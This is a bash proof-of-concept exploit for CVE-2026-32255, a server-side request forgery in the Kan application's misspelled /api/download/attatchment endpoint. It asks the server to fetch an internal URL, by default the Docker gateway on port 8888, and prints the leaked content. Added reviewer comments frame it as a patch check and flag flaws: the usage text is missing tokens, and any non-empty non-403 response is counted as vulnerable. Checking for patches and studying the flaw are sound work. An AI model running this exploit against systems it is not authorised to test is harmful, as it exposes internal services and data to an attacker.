#!/usr/bin/env bash
#
# CVE-2026-32255 - Kan SSRF via Attachment Download
# Proof of Concept Exploit
#
# Usage: ./exploit.sh [internal-url]
#
# Reviewer notes (for verifying whether an instance is patched):
#   - Positional args: $1 is the Kan base URL (required), $2 is the URL the
#     server will be asked to fetch. The Usage line above and the help text
#     below appear to have lost a "<target-url>" / "<docker-gateway>" token
#     (likely stripped as HTML); the runtime strings are left exactly as found.
#   - The only "fixed" signal this script recognises is an HTTP 403 from the
#     endpoint; every other verdict is inferred (see the note at Step 3).
set -euo pipefail

# $1: base URL of the instance under test; empty string when not supplied.
TARGET="${1:-}"
# Gateway IP of the default Docker bridge network, falling back to 172.17.0.1
# when docker is unavailable. Presumably the host address where the tester runs
# a listener on port 8888 — confirm before trusting a "vulnerable" result.
DOCKER_GATEWAY=$(docker network inspect bridge --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}' 2>/dev/null || echo "172.17.0.1")
# $2 overrides the URL the server is asked to fetch on the tester's behalf.
INTERNAL_URL="${2:-http://${DOCKER_GATEWAY}:8888}"
# Endpoint path spelled as in the original ("attatchment"); not changed here.
ENDPOINT="/api/download/attatchment"

if [ -z "$TARGET" ]; then
  echo "Usage: $0 [internal-url]"
  echo ""
  echo " target-url Base URL of the Kan instance (e.g., http://localhost:3000)"
  echo " internal-url Internal URL to fetch via SSRF (default: http://:8888)"
  exit 1
fi

# Strip trailing slash
TARGET="${TARGET%/}"

echo "=== CVE-2026-32255 - Kan SSRF via Attachment Download ==="
echo "Target: $TARGET"
echo "Internal URL: $INTERNAL_URL"
echo ""

# Step 1: Check if the endpoint is reachable
echo "[*] Checking if endpoint is reachable..."
# curl prints "000" for %{http_code} when no connection was made; "|| true"
# keeps set -e from aborting on curl's non-zero exit so that case is reported
# by the check below instead of silently killing the script.
STATUS=$(curl -s -o /dev/null -w "%{http_code}" "${TARGET}${ENDPOINT}" 2>/dev/null || true)
if [ "$STATUS" = "000" ]; then
  echo "[-] Could not connect to ${TARGET}"
  exit 1
fi
echo "[+] Endpoint is reachable (HTTP ${STATUS})"
echo ""

# Step 2: Attempt SSRF by requesting an internal resource
echo "[*] Attempting SSRF to ${INTERNAL_URL} ..."
# -G turns --data-urlencode into a GET query string (?url=...). The status
# code is appended as a final line after the body so the two can be split.
RESPONSE=$(curl -s -w "\n%{http_code}" -G "${TARGET}${ENDPOINT}" --data-urlencode "url=${INTERNAL_URL}" 2>/dev/null || true)
HTTP_CODE=$(echo "$RESPONSE" | tail -n1)   # last line: the status code
BODY=$(echo "$RESPONSE" | sed '$d')        # everything except the last line

if [ "$HTTP_CODE" = "000" ]; then
  echo "[-] No response from server"
  exit 1
fi

# A 403 is the signal that server-side URL validation rejected the request.
if [ "$HTTP_CODE" = "403" ]; then
  echo "[+] NOT VULNERABLE - Server rejected the request (HTTP 403)"
  echo " The URL validation is in place."
  exit 0
fi

if [ "$HTTP_CODE" = "500" ] || [ -z "$BODY" ]; then
  echo "[-] Server error or empty response (HTTP ${HTTP_CODE})"
  echo " The endpoint may not be vulnerable, or the internal service is not running."
  exit 1
fi

# Step 3: A 200 response with a body means the server proxied the request (SSRF confirmed)
# NOTE(review): nothing above restricts this branch to HTTP 200 — any status
# other than 000/403/500 that carries a non-empty body (e.g. a 401 or 404 page)
# also lands here and is reported as vulnerable. Check HTTP_CODE against 200
# and compare the body with what the listener actually served before trusting
# this verdict.
echo "[+] VULNERABLE - Server fetched internal resource (HTTP ${HTTP_CODE})"
echo ""
echo "Leaked content:"
echo "------------------------------------------------------------"
# Server-controlled bytes are written to the terminal unfiltered; treat them as
# untrusted output (control and escape sequences included).
echo "$BODY"
echo "------------------------------------------------------------"